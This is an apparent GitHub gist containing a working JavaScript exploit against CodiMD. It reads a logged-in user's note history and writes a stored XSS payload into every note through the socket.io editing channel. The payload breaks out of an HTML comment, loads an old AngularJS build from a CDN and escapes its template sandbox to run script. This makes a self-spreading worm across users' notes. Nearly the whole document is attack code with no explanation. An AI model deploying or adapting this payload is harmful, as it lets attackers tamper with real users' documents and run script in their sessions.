Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CodiMD > 1.3.0 add XSS to all user notes from history
var host = document.location.hostname + ':' + document.location.port;
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3';
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n';
$.get('/me', function(data){
if(data.status=="ok") {
$.get('/history', function(data) {
if(data.history.length > 0) {
for(h in data.history) {
var currentNoteId = data.history[h].id;
var execute = function(nId) {
var sock = io.connect({
path: '/socket.io/',
query: {
noteId: nId
},
timeout: 5000,
reconnectionAttempts: 20,
forceNew: true
});
sock.on('connect', function (data) {
});
sock.once('doc', function (obj) {
console.log(obj.str);
if(obj.str.search('ng-app') == -1) {
sock.emit("operation",0,[payload],{"ranges":[{"anchor":payload.length,"head":payload.length}]});
}
});
};
execute(currentNoteId);
}
}
});
}
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment